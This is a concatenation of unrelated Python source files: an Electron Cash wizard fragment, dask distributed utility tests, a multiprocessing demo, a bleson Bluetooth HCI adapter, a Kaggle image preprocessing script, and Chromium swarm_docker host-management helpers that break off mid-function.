def confirm_dialog(self, title, message, run_next, extra_button=None):
self.confirm(message, title, extra_button=extra_button)
def confirm(self, message, title, extra_button=None):
label = WWLabel(message)
textInteractionFlags = (Qt.LinksAccessibleByMouse
| Qt.TextSelectableByMouse
| Qt.TextSelectableByKeyboard
| Qt.LinksAccessibleByKeyboard)
label.setTextInteractionFlags(textInteractionFlags)
label.setOpenExternalLinks(True)
vbox = QVBoxLayout()
vbox.addWidget(label)
if extra_button:
self._add_extra_button_to_layout(extra_button, vbox)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self):
self.accept_signal.emit()
def waiting_dialog(self, task, msg):
self.please_wait.setText(MSG_GENERATING_WAIT)
self.refresh_gui()
t = threading.Thread(target = task)
t.start()
t.join()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next, extra_button=None):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
if extra_button:
self._add_extra_button_to_layout(extra_button, vbox)
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning=''):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
self.exec_layout(vbox, title, next_enabled=test(default))
return ' '.join(line.text().split())
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network):
message = _("Electron Cash communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfil the same purpose only differing in "
"hardware. In most cases you simply want to let Electron Cash "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
network.auto_connect = (r == 0)
self.config.set_key('auto_connect', network.auto_connect, True)
if r == 1:
nlayout = NetworkChoiceLayout(self, network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(1)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require %d signatures')%m)
cw.set_m(m)
def on_n(n):
n_label.setText(_('From %d cosigners')%n)
cw.set_n(n)
m_edit.setMaximum(n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
on_n(2)
on_m(2)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
linux_hw_wallet_support_dialog = None
def on_hw_wallet_support(self):
''' Overrides base wizard's noop impl. '''
if sys.platform.startswith("linux"):
if self.linux_hw_wallet_support_dialog:
self.linux_hw_wallet_support_dialog.raise_()
return
# NB: this should only be imported from Linux
from . import udev_installer
self.linux_hw_wallet_support_dialog = udev_installer.InstallHardwareWalletSupportDialog(self.top_level_window(), self.plugins)
self.linux_hw_wallet_support_dialog.exec_()
self.linux_hw_wallet_support_dialog.setParent(None)
self.linux_hw_wallet_support_dialog = None
else:
self.show_error("Linux only facility. FIXME!")
|
test_utils_test.py
|
import asyncio
import pathlib
import socket
import threading
from contextlib import contextmanager
from time import sleep
import pytest
from tornado import gen
from distributed import Client, Nanny, Scheduler, Worker, config, default_client
from distributed.core import rpc
from distributed.metrics import time
from distributed.utils import get_ip
from distributed.utils_test import (
cluster,
gen_cluster,
gen_test,
inc,
new_config,
tls_only_security,
wait_for_port,
)
def test_bare_cluster(loop):
with cluster(nworkers=10) as (s, _):
pass
def test_cluster(loop):
with cluster() as (s, [a, b]):
with rpc(s["address"]) as s:
ident = loop.run_sync(s.identity)
assert ident["type"] == "Scheduler"
assert len(ident["workers"]) == 2
@gen_cluster(client=True)
async def test_gen_cluster(c, s, a, b):
assert isinstance(c, Client)
assert isinstance(s, Scheduler)
for w in [a, b]:
assert isinstance(w, Worker)
assert s.nthreads == {w.address: w.nthreads for w in [a, b]}
assert await c.submit(lambda: 123) == 123
@gen_cluster(client=True)
async def test_gen_cluster_pytest_fixture(c, s, a, b, tmp_path):
assert isinstance(tmp_path, pathlib.Path)
assert isinstance(c, Client)
assert isinstance(s, Scheduler)
for w in [a, b]:
assert isinstance(w, Worker)
@pytest.mark.parametrize("foo", [True])
@gen_cluster(client=True)
async def test_gen_cluster_parametrized(c, s, a, b, foo):
assert foo is True
assert isinstance(c, Client)
assert isinstance(s, Scheduler)
for w in [a, b]:
assert isinstance(w, Worker)
@pytest.mark.parametrize("foo", [True])
@pytest.mark.parametrize("bar", ["a", "b"])
@gen_cluster(client=True)
async def test_gen_cluster_multi_parametrized(c, s, a, b, foo, bar):
assert foo is True
assert bar in ("a", "b")
assert isinstance(c, Client)
assert isinstance(s, Scheduler)
for w in [a, b]:
assert isinstance(w, Worker)
@pytest.mark.parametrize("foo", [True])
@gen_cluster(client=True)
async def test_gen_cluster_parametrized_variadic_workers(c, s, *workers, foo):
assert foo is True
assert isinstance(c, Client)
assert isinstance(s, Scheduler)
for w in workers:
assert isinstance(w, Worker)
@gen_cluster(
client=True,
Worker=Nanny,
config={"distributed.comm.timeouts.connect": "1s", "new.config.value": "foo"},
)
async def test_gen_cluster_set_config_nanny(c, s, a, b):
def assert_config():
import dask
assert dask.config.get("distributed.comm.timeouts.connect") == "1s"
assert dask.config.get("new.config.value") == "foo"
return dask.config
await c.run(assert_config)
await c.run_on_scheduler(assert_config)
@gen_cluster(client=True)
def test_gen_cluster_legacy_implicit(c, s, a, b):
assert isinstance(c, Client)
assert isinstance(s, Scheduler)
for w in [a, b]:
assert isinstance(w, Worker)
assert s.nthreads == {w.address: w.nthreads for w in [a, b]}
assert (yield c.submit(lambda: 123)) == 123
@gen_cluster(client=True)
@gen.coroutine
def test_gen_cluster_legacy_explicit(c, s, a, b):
assert isinstance(c, Client)
assert isinstance(s, Scheduler)
for w in [a, b]:
assert isinstance(w, Worker)
assert s.nthreads == {w.address: w.nthreads for w in [a, b]}
assert (yield c.submit(lambda: 123)) == 123
@pytest.mark.skip(reason="This hangs on travis")
def test_gen_cluster_cleans_up_client(loop):
import dask.context
assert not dask.config.get("get", None)
@gen_cluster(client=True)
async def f(c, s, a, b):
assert dask.config.get("get", None)
await c.submit(inc, 1)
f()
assert not dask.config.get("get", None)
@gen_cluster()
async def test_gen_cluster_without_client(s, a, b):
assert isinstance(s, Scheduler)
for w in [a, b]:
assert isinstance(w, Worker)
assert s.nthreads == {w.address: w.nthreads for w in [a, b]}
async with Client(s.address, asynchronous=True) as c:
future = c.submit(lambda x: x + 1, 1)
result = await future
assert result == 2
@gen_cluster(
client=True,
scheduler="tls://127.0.0.1",
nthreads=[("tls://127.0.0.1", 1), ("tls://127.0.0.1", 2)],
security=tls_only_security(),
)
async def test_gen_cluster_tls(e, s, a, b):
assert isinstance(e, Client)
assert isinstance(s, Scheduler)
assert s.address.startswith("tls://")
for w in [a, b]:
assert isinstance(w, Worker)
assert w.address.startswith("tls://")
assert s.nthreads == {w.address: w.nthreads for w in [a, b]}
@gen_test()
async def test_gen_test():
await asyncio.sleep(0.01)
@gen_test()
def test_gen_test_legacy_implicit():
yield asyncio.sleep(0.01)
@gen_test()
@gen.coroutine
def test_gen_test_legacy_explicit():
yield asyncio.sleep(0.01)
@contextmanager
def _listen(delay=0):
serv = socket.socket()
serv.bind(("127.0.0.1", 0))
e = threading.Event()
def do_listen():
e.set()
sleep(delay)
serv.listen(5)
ret = serv.accept()
if ret is not None:
cli, _ = ret
cli.close()
serv.close()
t = threading.Thread(target=do_listen)
t.daemon = True
t.start()
try:
e.wait()
sleep(0.01)
yield serv
finally:
t.join(5.0)
def test_wait_for_port():
t1 = time()
with pytest.raises(RuntimeError):
wait_for_port((get_ip(), 9999), 0.5)
t2 = time()
assert t2 - t1 >= 0.5
with _listen(0) as s1:
t1 = time()
wait_for_port(s1.getsockname())
t2 = time()
assert t2 - t1 <= 1.0
with _listen(1) as s1:
t1 = time()
wait_for_port(s1.getsockname())
t2 = time()
assert t2 - t1 <= 2.0
def test_new_config():
c = config.copy()
with new_config({"xyzzy": 5}):
config["xyzzy"] == 5
assert config == c
assert "xyzzy" not in config
def test_lingering_client():
@gen_cluster()
async def f(s, a, b):
await Client(s.address, asynchronous=True)
f()
with pytest.raises(ValueError):
default_client()
def test_lingering_client_2(loop):
with cluster() as (s, [a, b]):
client = Client(s["address"], loop=loop)
def test_tls_cluster(tls_client):
tls_client.submit(lambda x: x + 1, 10).result() == 11
assert tls_client.security
@pytest.mark.asyncio
async def test_tls_scheduler(security, cleanup):
async with Scheduler(security=security, host="localhost") as s:
assert s.address.startswith("tls")
|
futuros.py
|
import time
import multiprocessing
print("Number of cpu : ", multiprocessing.cpu_count())
from multiprocessing import Process
def proceso(fruta):
while True:
print("hola ", fruta)
time.sleep(2)
def proceso2(fruta):
while True:
print("hola ", fruta)
time.sleep(1)
def main():
proc = Process(target=proceso, args=("guayaba",))
proc.start()
proc = Process(target=proceso2, args=("lulo",))
proc.start()
print("procesos iniciados")
print(proc.join())
if __name__ == '__main__':
main()
|
linux_adapter.py
|
import array
import fcntl
import socket
import struct
import threading
from bleson.core.hci.constants import *
from bleson.core.hci.type_converters import AdvertisingDataConverters, parse_hci_event_packet, hex_string
from bleson.core.types import Device, BDAddress
from bleson.interfaces.adapter import Adapter
from bleson.logger import log
from .constants import *
class BluetoothHCIAdapter(Adapter):
def __init__(self, device_id=0):
self.device_id = device_id
self._keep_running = True
self._socket = None
self._socket_poll_thread = None
# User callbacks
self.on_advertising_data = None
def __del__(self):
self._keep_running = False
def open(self):
self._socket = socket.socket(socket.AF_BLUETOOTH, socket.SOCK_RAW, socket.BTPROTO_HCI)
self._socket.bind((self.device_id,))
self._socket_poll_thread = threading.Thread(target=self._socket_poller, name='HCISocketPoller')
self._socket_poll_thread.setDaemon(True)
self._socket_poll_thread.start()
self.device = self.get_device_info()
def close(self):
self._socket.close()
def send_cmd(self, cmd, data):
arr = array.array('B', data)
fcntl.ioctl(self._socket.fileno(), cmd, arr)
return arr
def send_cmd_value(self, cmd, value):
fcntl.ioctl(self._socket.fileno(), cmd, value)
def write_buffer(self, data):
log.debug(data)
self._socket.send(data)
def _set_filter(self, data):
self._socket.setsockopt(socket.SOL_HCI, socket.HCI_FILTER, data)
def _socket_poller(self):
while self._keep_running:
data = self._socket.recv(1024) # blocking
self._on_data(data)
# Adapter INfo
def get_device_info(self):
# C hci_dev_info struct defined at https://git.kernel.org/pub/scm/bluetooth/bluez.git/tree/lib/hci.h#n2382
hci_dev_info_struct = struct.Struct('=H 8s 6B L B 8B 3L 4I 10L')
request_dta = hci_dev_info_struct.pack(
self.device_id,
b'',
0, 0, 0, 0, 0, 0,
0,
0,
0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0,
0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
response_data = self.send_cmd(HCIGETDEVINFO, request_dta)
hci_dev_info = hci_dev_info_struct.unpack(response_data)
# Just extract a few parts for now
device_id = hci_dev_info[0]
device_name = hci_dev_info[1].split(b'\0',1)[0]
bd_address = hci_dev_info[2:8]
return Device(address=BDAddress(bd_address), name=device_name)
# -------------------------------------------------
# Adapter power control
def on(self):
self.send_cmd_value(HCIDEVUP, self.device_id)
def off(self):
self.send_cmd_value(HCIDEVDOWN, self.device_id)
# -------------------------------------------------
# Scanning
def set_scan_filter(self):
typeMask = 1 << HCI_EVENT_PKT
eventMask1 = (1 << EVT_CMD_COMPLETE) | (1 << EVT_CMD_STATUS)
eventMask2 = 1 << (EVT_LE_META_EVENT - 32)
opcode = 0
filter = struct.pack("<LLLH", typeMask, eventMask1, eventMask2, opcode)
self._set_filter(filter)
def set_scan_parameters(self):
len = 7
type = SCAN_TYPE_ACTIVE
internal = 0x0010 # ms * 1.6
window = 0x0010 # ms * 1.6
own_addr = LE_PUBLIC_ADDRESS
filter = FILTER_POLICY_NO_WHITELIST
cmd = struct.pack("<BHBBHHBB", HCI_COMMAND_PKT, LE_SET_SCAN_PARAMETERS_CMD, len,
type, internal, window, own_addr, filter )
self.write_buffer(cmd)
def set_scan_enable(self, enabled=False, filter_duplicates=False):
len = 2
enable = 0x01 if enabled else 0x00
dups = 0x01 if filter_duplicates else 0x00
cmd = struct.pack("<BHBBB", HCI_COMMAND_PKT, LE_SET_SCAN_ENABLE_CMD, len, enable, dups)
self.write_buffer(cmd)
# -------------------------------------------------
# Advertising
def set_advertising_filter(self):
typeMask = 1 << HCI_EVENT_PKT | (1 << HCI_ACLDATA_PKT)
eventMask1 = 1 << EVT_DISCONN_COMPLETE | (1 << EVT_CMD_COMPLETE) | (1 << EVT_CMD_STATUS)
eventMask2 = 1 << (EVT_LE_META_EVENT - 32)
opcode = 0
filter = struct.pack("<LLLH", typeMask, eventMask1, eventMask2, opcode)
self._set_filter(filter)
def set_advertise_enable(self, enabled):
cmd = struct.pack("<BHBB",
HCI_COMMAND_PKT,
LE_SET_ADVERTISE_ENABLE_CMD,
1, # cmd parameters length
0x01 if enabled else 0x00
)
self.write_buffer(cmd)
def set_advertising_parameter(self):
cmd = struct.pack("<BHB" + "H H 3B 6B B B",
HCI_COMMAND_PKT,
LE_SET_ADVERTISING_PARAMETERS_CMD,
15, # cmd parameters length
0x00a0, # min interval
0x00a0, # max interval
0x3, # adv type
0, # direct addr type
0, # direct addr type
0,0,0,0,0,0, # direct addr
0x07,
0x00
)
self.write_buffer(cmd)
def set_scan_response_data(self, data):
padded_data = memoryview(data).tolist()
padded_data.extend([0] * (31 - len(padded_data)))
cmd = struct.pack("<BHB" + "B31B",
HCI_COMMAND_PKT,
LE_SET_SCAN_RESPONSE_DATA_CMD,
32, # cmd parameters length
len(data),
*padded_data
)
self.write_buffer(cmd)
def set_advertising_data(self, data):
padded_data = memoryview(data).tolist()
padded_data.extend([0] * (31 - len(padded_data)))
print(f'adv data: {data}')
cmd = struct.pack("<BHB" + "B31B",
HCI_COMMAND_PKT,
LE_SET_ADVERTISING_DATA_CMD,
32, # cmd parameters length
len(data),
*padded_data
)
self.write_buffer(cmd)
# -------------------------------------------------
# Inbound event handler for all messages
def _handle_command_complete(self, data):
log.debug("EVT_CMD_COMPLETE")
# TODO: unpack based on: https://git.kernel.org/pub/scm/bluetooth/bluez.git/tree/lib/hci.h#n1853
if (data[5] << 8) + data[4] == LE_SET_SCAN_PARAMETERS_CMD:
if data[6] == HCI_SUCCESS:
log.debug('LE Scan Parameters Set');
elif (data[5] << 8) + data[4] == LE_SET_SCAN_ENABLE_CMD:
if data[6] == HCI_SUCCESS:
log.debug('LE Scan Enable Set')
elif (data[5] << 8) + data[4] == LE_SET_ADVERTISING_PARAMETERS_CMD:
if data[6] == HCI_SUCCESS:
log.debug('LE Advertising Parameters Set')
elif (data[5] << 8) + data[4] == LE_SET_ADVERTISING_DATA_CMD:
if data[6] == HCI_SUCCESS:
log.debug('LE Advertising Data Set')
elif (data[5] << 8) + data[4] == LE_SET_SCAN_RESPONSE_DATA_CMD:
if data[6] == HCI_SUCCESS:
log.debug('LE Scan Response Data Set')
elif (data[5] << 8) + data[4] == LE_SET_ADVERTISE_ENABLE_CMD:
if data[6] == HCI_SUCCESS:
log.debug('LE Advertise Enable Set')
def _handle_disconnection_complete(self, data):
log.debug("EVT_DISCONN_COMPLETE")
disconn_info = dict(
status=data[3],
handle=(data[5] << 8) + data[4],
reason=data[6]
)
log.debug(disconn_info)
def _handle_meta_event(self, hci_packet):
log.debug("EVT_LE_META_EVENT")
if hci_packet.subevent_code == EVT_LE_ADVERTISING_REPORT:
log.debug('LE Advertising Report')
if self.on_advertising_data:
advertisement = AdvertisingDataConverters.from_hcipacket(hci_packet)
self.on_advertising_data(advertisement)
else:
log.warning("TODO: unhandled HCI Meta Event packet, type={}".format(hci_packet))
def _on_data(self, data):
log.debug("----------------------------------------------------------------------")
log.debug("Socket data: len={}, data={}".format(len(data), hex_string(data)))
if data[0] == HCI_EVENT_PKT:
hci_event_packet = parse_hci_event_packet(data[1:-1])
log.debug(hci_event_packet)
if data[1] == EVT_CMD_COMPLETE:
self._handle_command_complete(data)
elif data[1] == EVT_DISCONN_COMPLETE:
self._handle_disconnection_complete(data)
elif data[1] == EVT_LE_META_EVENT:
self._handle_meta_event(hci_event_packet)
else:
log.warning("TODO: unhandled HCI Event packet, type={}".format(hci_event_packet))
else:
log.warning("TODO: Unhandled HCI packet, type={}".format(data[0]))
def start_scanning(self):
self.set_scan_enable(False)
self.set_scan_filter()
self.set_scan_parameters()
self.set_scan_enable(True, False)
def stop_scanning(self):
self.set_scan_enable(False)
def start_advertising(self, advertisement, scan_response=None):
self.set_advertising_filter()
self.set_advertise_enable(False)
self.set_advertising_parameter()
self.set_advertising_data(AdvertisingDataConverters.from_advertisement(advertisement))
if scan_response:
log.warning("TODO: support setting scan response")
# self.set_scan_response_data(scan_response_data.data)
self.set_advertise_enable(True)
def stop_advertising(self):
self.set_advertise_enable(False)
|
preprocess.py
|
"""
Preprocess image data for Dogs vs. Cats competition
https://www.kaggle.com/gauss256
DESCRIPTION
Most solutions for this competition will need to deal with the fact that the
training and test images are of varying sizes and aspect ratios, and were taken
under a variety of lighting conditions. It is typical in cases like this to
preprocess the images to make them more uniform.
By default this script will normalize the image luminance and resize to a
square image of side length 224. The resizing preserves the aspect ratio and
adds gray bars as necessary to make them square. The resulting images are
stored in a folder named data224.
The location of the input and output files, and the size of the images, can be
controlled through the processing parameters below.
INSTALLATION
This script has been tested on Ubuntu 14.04 using the Anaconda distribution for
Python 3.5. The only additional requirement is for the pillow library for image
manipulation which can be installed via:
conda install pillow
"""
import glob
from multiprocessing import Process
import os
import re
import numpy as np
import PIL
from PIL import Image
# Processing parameters
SIZE = 128 # 28 MNIST ;224 for ImageNet models compatibility
TEST_DIR = 'data/input/raw/test/'
TRAIN_DIR = 'data/input/raw/train/'
BASE_DIR = 'data/input/'
def natural_key(string_):
"""
Define sort key that is integer-aware
"""
return [int(s) if s.isdigit() else s for s in re.split(r'(\d+)', string_)]
def norm_image(img):
"""
Normalize PIL image
Normalizes luminance to (mean,std)=(0,1), and applies a [1%, 99%] contrast stretch
"""
img_y, img_b, img_r = img.convert('YCbCr').split()
img_y_np = np.asarray(img_y).astype(float)
img_y_np /= 255
img_y_np -= img_y_np.mean()
img_y_np /= img_y_np.std()
scale = np.max([np.abs(np.percentile(img_y_np, 1.0)),
np.abs(np.percentile(img_y_np, 99.0))])
img_y_np = img_y_np / scale
img_y_np = np.clip(img_y_np, -1.0, 1.0)
img_y_np = (img_y_np + 1.0) / 2.0
img_y_np = (img_y_np * 255 + 0.5).astype(np.uint8)
img_y = Image.fromarray(img_y_np)
img_ybr = Image.merge('YCbCr', (img_y, img_b, img_r))
img_nrm = img_ybr.convert('RGB')
return img_nrm
def resize_image(img, size):
"""
Resize PIL image
Resizes image to be square with sidelength size. Pads with black if needed.
"""
# Resize
n_x, n_y = img.size
if n_y > n_x:
n_y_new = size
n_x_new = int(size * n_x / n_y + 0.5)
else:
n_x_new = size
n_y_new = int(size * n_y / n_x + 0.5)
img_res = img.resize((n_x_new, n_y_new), resample=PIL.Image.BICUBIC)
# Pad the borders to create a square image
img_pad = Image.new('RGB', (size, size), (128, 128, 128))
ulc = ((size - n_x_new) // 2, (size - n_y_new) // 2)
img_pad.paste(img_res, ulc)
return img_pad
def gray_image(img):
return img.convert('L')
def prep_images(paths, out_dir):
"""
Preprocess images
Reads images in paths, and writes to out_dir
"""
for count, path in enumerate(paths):
if count % 100 == 0:
print(path)
img = Image.open(path)
img_nrm = norm_image(img)
img_gry = gray_image(img_nrm)
img_res = resize_image(img_gry, SIZE)
basename = os.path.basename(path)
path_out = os.path.join(out_dir, basename)
img_res.save(path_out)
def main():
"""Main program for running from command line"""
# Get the paths to all the image files
train_cats = sorted(glob.glob(os.path.join(TRAIN_DIR, 'cat*.jpg')), key=natural_key)
train_dogs = sorted(glob.glob(os.path.join(TRAIN_DIR, 'dog*.jpg')), key=natural_key)
test_all = sorted(glob.glob(os.path.join(TEST_DIR, '*.jpg')), key=natural_key)
# Make the output directories
base_out = os.path.join(BASE_DIR, '{}'.format(SIZE))
train_dir_out = os.path.join(base_out, 'train')
test_dir_out = os.path.join(base_out, 'test')
os.makedirs(train_dir_out, exist_ok=True)
os.makedirs(test_dir_out, exist_ok=True)
# Preprocess the training files
procs = dict()
procs[1] = Process(target=prep_images, args=(train_cats, train_dir_out, ))
procs[1].start()
procs[2] = Process(target=prep_images, args=(train_dogs, train_dir_out, ))
procs[2].start()
procs[3] = Process(target=prep_images, args=(test_all, test_dir_out, ))
procs[3].start()
procs[1].join()
procs[2].join()
procs[3].join()
if __name__ == '__main__':
main()
|
main_helpers.py
|
# Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from __future__ import print_function
import argparse
import contextlib
import datetime
import hashlib
import json
import logging
import logging.handlers
import os
import socket
import subprocess
import sys
import threading
import time
from infra.libs.service_utils import daemon
from infra.services.swarm_docker import containers
_REGISTRY_URL = 'gcr.io'
# Location of file that will prevent this script from spawning new containers.
# Useful when draining a host in order to debug failures. BOT_SHUTDOWN_FILE
# drains all containers, but individual containers can also be drained using
# container's shutdown file as returned by its descriptor class.
BOT_SHUTDOWN_FILE = '/b/shutdown.stamp'
# Similar to BOT_SHUTDOWN_FILE, but triggers a host reboot after all containers
# have been drained.
BOT_REBOOT_FILE = '/b/reboot.stamp'
# Minimum time a host must be up before it can be restarted again.
_MIN_HOST_UPTIME = 60
# Defined in
# https://chromium.googlesource.com/infra/infra/+/master/build/packages/swarm_docker.yaml
_CIPD_VERSION_FILE = os.path.abspath(os.path.join(
os.path.dirname(__file__), '..', '..', '..', 'CIPD_VERSION.json'))
def get_cipd_version(): # pragma: no cover
if not os.path.exists(_CIPD_VERSION_FILE):
logging.warning('Unable to find cipd version file %s', _CIPD_VERSION_FILE)
return None
try:
with open(_CIPD_VERSION_FILE) as f:
d = json.load(f)
return d.get('instance_id')
except (IOError, ValueError):
logging.exception('Unable to read cipd version file %s', _CIPD_VERSION_FILE)
return None
def fuzz_max_uptime(max_uptime):
"""Returns max_uptime fuzzed by up to 20% of the original value."""
fqdn = socket.getfqdn()
# Don't use the built-in hash function since that's not deterministic across
# different processes.
fqdn_hash = hashlib.md5(fqdn).hexdigest()
fuzz_amount = int(fqdn_hash, 16) % int(max_uptime * 0.2)
return max_uptime + fuzz_amount
def get_host_uptime():
"""Returns host uptime in minutes."""
with open('/proc/uptime') as f:
uptime = float(f.readline().split()[0])
return uptime / 60
def update_docker(canary, version='18.06.3~ce~3-0~ubuntu'): # pragma: no cover
"""Update the docker package prior to reboot.
This will automatically keep the docker package up to date and running prior
to reboot will ensure that no containers are running, so no disruptions. This
will also remove older docker packages (docker-engine) automatically.
If the bot is a docker_canary, then the latest version of docker-ce will be
installed, otherwise the pinned version= version will be installed.
Args:
canary: (bool) If this is a canary host or not.
version: (str) The version of docker-ce to ensure is installed.
"""
# Not doing a lot of dpkg/apt-cache checking here as the runtime to just try
# an install is only 1.1 seconds.
try:
subprocess.check_call(['/usr/bin/apt-get', 'update'])
except subprocess.CalledProcessError:
# We don't care enough to abort reboot here, only if install fails.
logging.exception('Unable to apt-get update.')
if canary:
package_with_version = 'docker-ce'
else:
package_with_version = 'docker-ce=%s' % version
try:
subprocess.check_call(['/usr/bin/apt-get', 'install', '-y',
package_with_version])
except subprocess.CalledProcessError:
logging.exception('Unable to install/upgrade docker-ce to %s.', version)
return False
return True
def reboot_host(canary=False, skip_update=False): # pragma: no cover
if not skip_update and not update_docker(canary):
logging.warning('Not rebooting, something went wrong.')
return
# This script runs as root.
try:
subprocess.check_call(['/sbin/reboot'])
except subprocess.CalledProcessError:
logging.exception('Unable to reboot host.')
class FlockTimeoutError(Exception):
pass
@contextlib.contextmanager
def flock(lock_file, retries=20, sleep_duration=3): # pragma: no cover
logging.debug('Acquiring file lock on %s...', lock_file)
i = 0
while True:
try:
with daemon.flock(lock_file):
logging.debug('Lock acquired on %s.', lock_file)
try:
yield
finally:
logging.debug('Releasing lock on %s.', lock_file)
break
except daemon.LockAlreadyLocked:
if i == retries - 1:
raise FlockTimeoutError()
else:
logging.debug('Lock on %s busy; sleeping for %d seconds.',
lock_file, sleep_duration)
i += 1
time.sleep(sleep_duration)
def reboot_gracefully(args, running_containers):
"""Reboot the host and attempt to gracefully stop running containers.
Returns:
True if reboot sequence has been started. Callers should not spawn new
containers. Actual reboot may not be triggered due to running tasks.
"""
uptime = get_host_uptime()
fuzzed_max_host_uptime = fuzz_max_uptime(args.max_host_uptime)
mins_since_scheduled_reboot = uptime - fuzzed_max_host_uptime
if mins_since_scheduled_reboot > 0:
logging.debug('Host uptime over fuzzed max uptime (%d > %d).',
uptime, fuzzed_max_host_uptime)
else:
return False
if running_containers:
if mins_since_scheduled_reboot > args.reboot_grace_period:
logging.warning(
'Drain exceeds grace period of %d min. Rebooting host now '
'despite %d running containers.', args.reboot_grace_period,
len(running_containers))
reboot_host(args.canary)
else:
logging.debug(
'Still %d containers running. Shutting them down first.',
len(running_containers))
for c in running_containers:
c.kill_swarming_bot()
else:
logging.debug('No running containers. Rebooting host now.')
reboot_host(args.canary)
return True
def launch_containers(
docker_client, container_descriptors, args): # pragma: no cover
rebooting_host = os.path.exists(BOT_REBOOT_FILE)
draining_host = os.path.exists(BOT_SHUTDOWN_FILE)
draining_container_descriptors = [
cd for cd in container_descriptors if os.path.exists(cd.shutdown_file)
]
if draining_host:
logging.info(
'In draining state due to existence of %s. No new containers will be '
'created.', BOT_SHUTDOWN_FILE)
elif rebooting_host:
logging.info(
'In draining state due to existence of %s. No new containers will be '
'created and host will be restarted.', BOT_REBOOT_FILE)
elif draining_container_descriptors:
logging.info(
'Draining containers %s due to existence of files: %s. They will not '
'be restarted automatically.',
[cd.name for cd in draining_container_descriptors],
[cd.shutdown_file for cd in draining_container_descriptors])
running_containers = docker_client.get_running_containers()
if (not draining_host and not rebooting_host and args.max_host_uptime
and reboot_gracefully(args, running_containers)):
return
# Fetch the image from the registry if it's not present locally.
image_url = (_REGISTRY_URL + '/' + args.registry_project + '/' +
args.image_name)
if not docker_client.has_image(image_url):
logging.debug('Local image missing. Fetching %s ...', image_url)
docker_client.login(_REGISTRY_URL, args.credentials_file)
docker_client.pull(image_url)
logging.debug('Image %s fetched.', image_url)
# Cleanup old containers that were stopped from a previous run.
# TODO(bpastene): Maybe enable auto cleanup with the -rm option?
docker_client.delete_stopped_containers()
# Send SIGTERM to bots in containers that have been running for too long, or
# all of them regardless of uptime if draining. For Android containers (see
# infra.services.android_swarm package), some containers may go missing due
# to associated devices missing, so we need to examine *all* containers here
# instead of doing that inside the per-container flock below.
current_cipd_version = get_cipd_version()
if draining_host or rebooting_host:
for c in running_containers:
c.kill_swarming_bot()
if rebooting_host and not running_containers:
os.remove(BOT_REBOOT_FILE)
reboot_host(args.canary)
else:
for cd in draining_container_descriptors:
c = docker_client.get_container(cd)
if c is not None:
c.kill_swarming_bot()
docker_client.stop_old_containers(
running_containers, args.max_container_uptime)
# Also stop any outdated container.
if current_cipd_version is not None:
for c in running_containers:
if c.labels.get('cipd_version') != current_cipd_version:
logging.debug(
'Container %s is out of date. Shutting it down.', c.name)
c.kill_swarming_bot()
# Make sure all requested containers are running.
def _create_container(container_desc):
try:
with flock(container_desc.lock_file):
c = docker_client.get_container(container_desc)
if c is None:
labels = {}
# Attach current cipd version to container's metadata so it can
# be restarted if version changes.
if current_cipd_version is not None:
labels['cipd_version'] = current_cipd_version
docker_client.create_container(
container_desc, image_url, args.swarming_server, labels)
elif c.state == 'paused':
# Occasionally a container gets stuck in the paused state. Since
# the logic here is thread safe, this shouldn't happen, so
# explicitly unpause them before continuing.
# TODO(bpastene): Find out how/why.
logging.warning('Unpausing container %s.', c.name)
c.unpause()
else:
logging.debug('Nothing to do for container %s.', c.name)
except FlockTimeoutError:
logging.error(
'Timed out while waiting for lock on container %s.',
container_desc.name)
threads = []
docker_client.set_num_configured_containers(len(container_descriptors))
for cd in container_descriptors:
# TODO(sergiyb): Remove should_create_container logic from this generic
# container management loop and move it outside of the launch_container
# function as it's specific to Android devices only and thus should only
# be in the android_docker package.
if (cd.should_create_container() and
cd not in draining_container_descriptors):
# Split this into threads so a blocking container doesn't block the
# others (and also for speed!)
t = threading.Thread(target=_create_container, args=(cd,))
threads.append(t)
t.start()
for t in threads:
